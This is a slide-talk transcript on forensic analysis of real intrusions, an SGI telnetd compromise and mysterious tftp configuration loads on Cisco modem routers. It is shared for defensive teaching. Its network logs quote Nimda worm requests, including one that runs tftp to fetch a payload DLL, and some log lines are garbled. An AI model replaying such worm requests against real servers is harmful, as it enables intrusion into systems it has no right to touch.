Forensic Vulnerability Discovery And Analysis Or… #0w 1 2 $t0p \/\/0rrY1N9 & LOV3 7h3 $p|0i7 !! E. Larry Lidz The University of Chicago

Slides:



Advertisements
Similar presentations
Fred P. Baker CCIE, CCIP(security), CCSA, MCSE+I, MCSE(2000)
Advertisements

Thank you to IT Training at Indiana University Computer Malware.
Code-Red : a case study on the spread and victims of an Internet worm David Moore, Colleen Shannon, Jeffery Brown Jonghyun Kim.
Investigating Malicious Software Steve Romig The Ohio State University April 2002.
Computer Security Fundamentals by Chuck Easttom Chapter 4 Denial of Service Attacks.
System and Network Security Practices COEN 351 E-Commerce Security.
Intruder Trends Tom Longstaff CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA Sponsored by.
Chapter 23: ARP, ICMP, DHCP IS333 Spring 2015.
COEN 252: Computer Forensics Router Investigation.
1 Lecture 20: Firewalls motivation ingredients –packet filters –application gateways –bastion hosts and DMZ example firewall design using firewalls – virtual.
Computer Security Update Bob Cowles, SLAC stanford.edu Presented at HEPiX - TRIUMF 23 Oct 2003 Work supported by U. S. Department of Energy.
Module 6: Patches and Security Updates 1. Overview Installing Patches and Security Updates Recent patches and security updates for IIS Recent patches.
Network Security1 – Chapter 3 – Device Security (B) Security of major devices: How to protect the device against attacks aimed at compromising the device.
Desktop Security: Worms and Viruses Brian Arkills, C&C NDC-Sysmgt.
IST 228\Ch3\IP Addressing1 TCP/IP and DoD Model (TCP/IP Model)
Reconnaissance & Enumeration Baseline, Monitor, Detect, Analyze, Respond, & Recover Hervey Allen Chris Evans Phil Regnauld September 3 – 4, 2009 Santiago,
1 Chapter 6 Network Security Threats. 2 Objectives In this chapter, you will: Learn how to defend against packet sniffers Understand the TCP, UDP, and.
RFC6520 defines SSL Heartbeats - What are they? 1. SSL Heartbeats are used to keep a connection alive without the need to constantly renegotiate the SSL.
Vulnerabilities. flaws in systems that allow them to be exploited provide means for attackers to compromise hosts, servers and networks.
Port Knocking Software Project Presentation Paper Study – Part 1 Group member: Liew Jiun Hau ( ) Lee Shirly ( ) Ong Ivy ( )
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.
1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.
National Energy Research Scientific Computing Center (NERSC) Computer Security – The New Threats Stephen Lau NERSC Center Division, LBNL June 24, 2004.
Switch Concepts and Configuration and Configuration Part II Advanced Computer Networks.
Karlstad University Introduction to Vulnerability Assessment Labs Ge Zhang Dvg-C03.
Port Scanning 0x470~0x480 Presenter SangDuk Seo 1.
Talking points Attacks are more frequent, more aggressive, require more time to repair and prevent Machines get compromised in 2003 for the same reasons.
ECE4112 Lab 7: Honeypots and Network Monitoring and Forensics Group 13 + Group 14 Allen Brewer Jiayue (Simon) Chen Daniel Chu Chinmay Patel.
Honeypot and Intrusion Detection System
OS Hardening Justin Whitehead Francisco Robles. ECE Internetwork Security OS Hardening Installing kernel/software patches and configuring a system.
1 © 2007 Cisco Systems, Inc. All rights reserved.Cisco Public Remote access typically involves allowing telnet, SSH connections to the router Remote requires.
Cisco S2 C4 Router Components. Configure a Router You can configure a router from –from the console terminal (a computer connected to the router –through.
Internet and Intranet Fundamentals Class 9 Session A.
Lecture 15 Page 1 Advanced Network Security Perimeter Defense in Networks: Firewalls Configuration and Management Advanced Network Security Peter Reiher.
INSTALLATION HANDS-ON. Page 2 About the Hands-On This hands-on section is structured in a way, that it allows you to work independently, but still giving.
Security at NCAR David Mitchell February 20th, 2007.
Thoughts on Firewalls: Topologies, Application Impact, Network Management, Tech Support and more Deke Kassabian, April 2007.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
Linux Networking and Security
1 Figure 4-1: Targeted System Penetration (Break-In Attacks) Host Scanning  Ping often is blocked by firewalls  Send TCP SYN/ACK to generate RST segments.
What is a port The Ports Collection is essentially a set of Makefiles, patches, and description files placed in /usr/ports. The port includes instructions.
Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.
NetTech Solutions Protecting the Computer Lesson 10.
Privilege Escalation Two case studies. Privilege Escalation To better understand how privilege escalation can work, we will look at two relatively recent.
Traffic Instrumentation and Management CSG, January 2002.
Role Of Network IDS in Network Perimeter Defense.
A PC Wakes Up A STORY BY VICTOR NORMAN. Once upon a time…  a PC (we’ll call him “H”) is connected to a network and turned on. Aside: The network looks.
Software - Utilities Objectives Understand what is meant by utility software and application software Look at common utilities – Security – Disk organisation.
Lecture 15 Page 1 CS 236 Online Evaluating Running Systems Evaluating system security requires knowing what’s going on Many steps are necessary for a full.
Vmware 2V0-621D Vmware Exam Questions & Answers VMware Certified Professional 6 Presents
Lecture 12 Page 1 CS 136, Spring 2009 Network Security: Firewalls CS 136 Computer Security Peter Reiher May 12, 2009.
Chapter 23: ARP, ICMP, DHCP CS332 Spring 2016 Victor Norman.
Monitoring Dynamic IOC Installations Using the alive Record Dohn Arms Beamline Controls & Data Acquisition Group Advanced Photon Source.
Lecture 19 Page 1 CS 236 Online 6. Application Software Security Why it’s important: –Security flaws in applications are increasingly the attacker’s entry.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Working at a Small-to-Medium Business or ISP – Chapter 8
The Linux Operating System
CCNA Routing and Switching Routing and Switching Essentials v6.0
Cisco Switching Basics
Hervey Allen Chris Evans Phil Regnauld September 3 – 4, 2009
Chapter 10: Device Discovery, Management, and Maintenance
CCNA Routing and Switching Routing and Switching Essentials v6.0
NAT , Device Discovery Chapter 9 , chapter 10.
Nessus Vulnerability Scanning
Information Security Session October 24, 2005
Chapter 10: Device Discovery, Management, and Maintenance
– Chapter 3 – Device Security (B)
Lecture9: Embedded Network Operating System: cisco IOS
6. Application Software Security
Lecture9: Embedded Network Operating System: cisco IOS
Presentation transcript:

Forensic Vulnerability Discovery And Analysis Or… #0w 1 2 $t0p \/\/0rrY1N9 & LOV3 7h3 $p|0i7 !! E. Larry Lidz The University of Chicago

What does that title mean? Someone broke into your fully patched system… now what? This is not a how-to. Most vulnerabilities are discovered by researchers, but… …some are first encountered in the wild. Attackers protect their 0-day ‘sploit binaries.

Two Examples SGI Telnetd –Happened about two years ago. Cisco tftp issue –Happened about a month ago. The emphasis of this talk is on the process of the investigation, not the solutions to the problems.

SGI – The Events Unfold First, a campus-wide scan for port 5232 –5232: the distributed GL daemon –SGI-specific service – at about 21:00 A handful of SGIs were compromised

Network Forensics 02/22/ :10:40 -> 02/22/ :10: f /22/ :11:31 -> 02/22/ :11: dpkeyserv /22/ :12:57 -> 02/22/ :13: shell b /22/ :11:42 -> 02/22/ :13: telnet /22/ :17:11 -> 02/22/ :17: /22/ :17:23 -> 02/22/ :17: /22/ :17:23 -> 02/22/ :17: ssh /22/ :19:14 -> 02/22/ :20: telnet /22/ :23:35 -> 02/22/ :23: telnet f

Network Forensics, II Almost all of the compromised machines showed similar network traffic connections only happened on SGIs. Port 5135 is the SGI Object Server. Rshell always followed the telnet and was always back to the ObjServer scanning machine.

System Forensics “hehe” account added to systems, uid 987 Login was a telnet from /tmp/.new home dir with.cshrc,.profile –System default skeleton stuff Privilege escalation exploit for “df” installed: “as” Compromised machines had “feer” account (uid 112) and a “passwd” account (uid 0), both without pws.

What we know so far…

Theory #1 Theory… –Known SGI Object server exploit Problems… –ObjServer exploit gives root access, so why have the df exploit there? –One of the machines was patched for it. –Two machines were recompromised on the 25 th after being patched. –On March 5 th, a machine with all the latest patches was compromised. They got in, but not as root.

Network Forensics 02/22/ :10:40 -> 02/22/ :10: f /22/ :11:31 -> 02/22/ :11: dpkeyserv /22/ :12:57 -> 02/22/ :13: shell b /22/ :11:42 -> 02/22/ :13: telnet /22/ :17:11 -> 02/22/ :17: /22/ :17:23 -> 02/22/ :17: /22/ :17:23 -> 02/22/ :17: ssh /22/ :19:14 -> 02/22/ :20: telnet /22/ :23:35 -> 02/22/ :23: telnet f

Theory #2 New vulnerability Network logs sort of imply telnet bug given traffic levels. Contact CERT, SGI. SGI releases advisory about telnetd.

And onto…Cisco Logs from one of our Cisco AS5300 modem pool tips that state: –Jul 7 19:30:22 x-mdm.uchicago.edu : Jul 7 19:30:22: %PARSER-4-BADCFG: Unexpected end of configuration file.

Theory #1 The theory… –Someone was tftping a configuration file to the modem pool and didn’t have an “end” at the end of the configuration file. The problem… –We asked everyone with access and no one was on the system at the time.

Log file Analysis All three of our public tips had the following on two different days at three different times: –Configuration from tftp:// / -confg –Configuration from tftp:// / -confg by console –4-5 minutes pass –Configuration from tftp:// /network-confg –Configuration from tftp:// /network-confg by console TACACS logs show no logins to the AS5300s at the time of the tftps. Same person was logged into at each of the three times.

System Forensics “show ver” shows: –System restarted at 06:03:33 GMT Tue Mar System image file is “flash:c5300-js-mz_120-6_5.T4 Host configuration file is “tftp:// / -confg” Network configuration file is “tftp:// /network-confg No reboot recently. Configuration was successfully changed… …but there were no visible changes to the config

Network Forensics No odd connections to the AS5300s from off campus or any of the places on campus where we have network logs. Analysis of audit logs for reveal…

Flow logs 07/10/ :08:17 -> 07/10/ :08: S /10/ :08:17 -> 07/10/ :08: S /10/ :08:17 -> 07/10/ :08: S /10/ :08:17 -> 07/10/ :08: S /10/ :08:17 -> 07/10/ :08: S /10/ :08:17 -> 07/10/ :08: S /10/ :08:32 -> 07/10/ :08: FS-PA-

Argus Logs 10 Jul 02 20:09:37 icmp > TXD 10 Jul 02 20:09:37 icmp > TXD 10 Jul 02 20:09:39 tcp > sSEfR s[64]="GET /scripts/root.exe?/c+tftp%20i% %20GET%20cool.dll%" d[64]="HTTP/ Pragma: no-cache..Cache-Control: no-cache..Content" 10 Jul 02 20:10:25 icmp > URH 10 Jul 02 20:09:42 tcp > sSEfR s[64]="GET /scripts/httpodbc.dll HTTP/1.0..Host: clos" d[64]="HTTP/ Pragma: no-cache..Cache-Control: no- cache..Content" 10 Jul 02 20:09:42 tcp > sSEfFR s[64]="GET /MSADC/root.exe?/c+dir HTTP/1.0..Host: clo" d[64]="HTTP/ Pragma: no-cache..Cache-Control: no- cache..Content"

Other details… Vulnerability analysis of AS5300: –Running old version of code, vulnerable to the big SNMP bug. –Ntp, tacacs, and telnet run on it. No known problems with any of them. Mitigating factors: –Access lists should drop SNMP traffic. (unless spoofed from management vlan) –SNMP writes were disabled.

Theory #2 Nimda machine attacked the AS5300 –New version of Nimda? Seems unlikely, but… Machine attempts to get the routers to configure from it, then attacker (somehow) reboots the AS5300 to get it to use the new config. If a few OIDs were set, tftps could be triggered in such a way to create the logs and “show ver” output. –But SNMP writes were disabled… Maybe it used the SNMP bug? –But why would it log anything then? They can run whatever code they want. Maybe it’s a new bug.

Next… Talk to Cisco… …not much in the way of information from them.

forensics Owner let us borrow it for a few weeks Two partitions: WinME on FAT32, Win2k Server Chinese Edition on NTFS Duplicate disk with hardware disk duplicator. Look at FAT32 partition on different system –Lots of Nimda.E infected files, not much else. –Appears to have been infected from Win2k partition. Boot it up, look at network traffic… nothing.

forensics, NTFS Partition corrupt –We didn’t have identical size disk. –Try to fix it… unable to. Make Ghost image –Not ideal, but should give some information. Investigate on external system –IIS Server infected while dialed into AT&T Our modem pool blocks incoming www. –Lots of Nimda.E, but nothing else.

Theory #3 only infected with Nimda.E. Attack came from outside, AS5300 tftps to broadcast responds. –Perhaps Nimda.E returns payload regardless of filename requested? –If not, Windows tftp server certainly returns an empty file instead of an error. AS5300 updates its tftp server, tries again.

Theory #3 thoughts AS5300 might not be the only target –(if it was, it was an odd choice…) –Nimda isn’t popular on our network, so if we had seen lots of attacks, this might have been the only successful response. We don’t know what a failed attack looks like. Explains why AS5300 config didn’t change. …but… –Looked at network logs for tftps to broadcast. Didn’t see any. Odd as we know some of our routers log all connections.

So… Is this a new attack, or was it just some odd random occurance/user error? If it is an attack, why use tftp? What is the connection to SNMP, if any?

Conclusions It is often really difficult to know what you are seeing. No binaries to pull apart. It’s important to communicate with the vendor… but don’t expect much communication back. You don’t always get the answer in the end.